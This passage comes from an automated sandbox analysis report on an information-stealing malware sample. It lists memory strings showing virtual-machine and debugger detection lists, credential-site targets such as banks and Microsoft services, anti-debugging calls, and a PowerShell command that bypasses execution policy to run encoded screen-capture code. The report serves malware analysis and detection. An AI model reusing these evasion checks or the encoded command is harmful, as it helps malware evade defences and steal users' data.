            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmware"
            Source: NETSTAT.EXE, 00000047.00000002.2257640995.000001D25C958000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426421172.0000018B49CB9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Remote Desktop Virtualization Service
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmtoolsd.exe"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SERVICE_NAME: vmicheartbeat
            Source: sc.exe, 00000048.00000002.2258659401.0000022125EEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SERVICE_NAME: vmicvss
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmsrvc.exe"@W
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SERVICE_NAME: vmicshutdown
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2417097978.0000018B495CA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445935024.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2433574668.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2430757947.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hostNames = ['sandbox','cuckoo', 'vm', 'virtual', 'qemu', 'vbox', 'xen']
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmsrvc.exe"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmwareuser.exe"0m
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc.exeP
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if b'VMware' in stdout:
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: sc.exe, 00000048.00000002.2258659401.0000022125EEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ws Connect Now - Config RegistrarwcncsvcWindows Connection ManagerWcmsvcWindows Biometric ServiceWbioSrvcBlock Level Backup user ServicewbuserWarpJITSvcWarpJITSvcWalletServiceWalletServiceWindows TimeW32TimeVolume Shadow CopyVSSHyper-V Volume Shadow Copy RequestorvmicvssHyper-V PowerShell Direct ServicevmicvmsessionHyper-V Time Synchronization ServicevmQ$k
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmwareuser.exe"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vmwaretray.exe", # VMware
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmusrvc.exe"P
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: self.banned_process = ["HTTP Toolkit.exe", "httpdebuggerui.exe","wireshark.exe", "fiddler.exe", "regedit.exe", "taskmgr.exe", "vboxservice.exe", "df5serv.exe", "processhacker.exe", "vboxtray.exe", "vmtoolsd.exe", "vmwaretray.exe", "ida64.exe", "ollydbg.exe",
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426421172.0000018B49CB9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Heartbeat Service
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: elif b"vmware" in stdout2.lower():
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu0{
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2441219336.0000018B472C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2437747781.0000018B472BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426421172.0000018B49CB9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000048.00000002.2258659401.0000022125EEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Time Synchronization Service
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: [1VMware0g
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: net1.exe, 0000003B.00000002.2232321509.0000010E3AB98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Administrators
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray.exe0l
            Source: sc.exe, 00000048.00000002.2258659401.0000022125EEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat ServicevmicheartbeatHyper-V Guest Service InterfacevmicguestinterfaceVirtual DiskvdsCredential ManagerVaultSvcVolumetric Audio Compositor ServF/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return any(x.lower() in decoded_output[2].strip().lower() for x in ("virtualbox", "vmware"))
            Source: ROUTE.EXE, 00000045.00000002.2254301390.0000019424DC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445935024.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2433574668.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2430757947.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vboxtray.exe", # VirtualBox
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426421172.0000018B49CB9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Guest Shutdown Service
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: b'VMware'
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426421172.0000018B49CB9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2444712748.0000018B47CB0000.00000004.00001000.00020000.00000000.sdmp, sc.exe, 00000048.00000002.2258659401.0000022125EEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Guest Service Interface
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice.exepk
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice.exep
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmwaretray.exe"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 'qemu'
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc.exe0o
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwarepy
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: b'VMware'g
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vboxservice.exe"pm
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447553924.0000018B4A1C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
            Source: ARP.EXE, 00000046.00000002.2256312580.0000015ABB729000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmusrvc.exe"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "qemu-ga.exe"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vmacthlp.exe", # VMware
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Potentially malicious time measurement code found
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93D142412_2_00007FFD93D14241
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93D1572C2_2_00007FFD93D1572C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93D132F6 rdtsc 2_2_00007FFD93D132F6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 0_2_00007FF7B2B6D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7B2B6D12C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD94064460 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00007FFD94064460
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 0_2_00007FF7B2B83480 GetProcessHeap,0_2_00007FF7B2B83480
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\NETSTAT.EXEProcess token adjusted: Debug
            Source: C:\Windows\System32\NETSTAT.EXEProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 0_2_00007FF7B2B6D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7B2B6D12C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 0_2_00007FF7B2B6D30C SetUnhandledExceptionFilter,0_2_00007FF7B2B6D30C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 0_2_00007FF7B2B6C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7B2B6C8A0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 0_2_00007FF7B2B7A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7B2B7A614
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FF7B2B6D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF7B2B6D12C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FF7B2B6D30C SetUnhandledExceptionFilter,2_2_00007FF7B2B6D30C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FF7B2B6C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF7B2B6C8A0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FF7B2B7A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF7B2B7A614
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93BF3068 IsProcessorFeaturePresent,00007FFDA54619A0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFDA54619A0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFD93BF3068
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93D15A1F IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFD93D15A1F

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Bypasses PowerShell execution policy
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
            Encrypted powershell cmdline option found
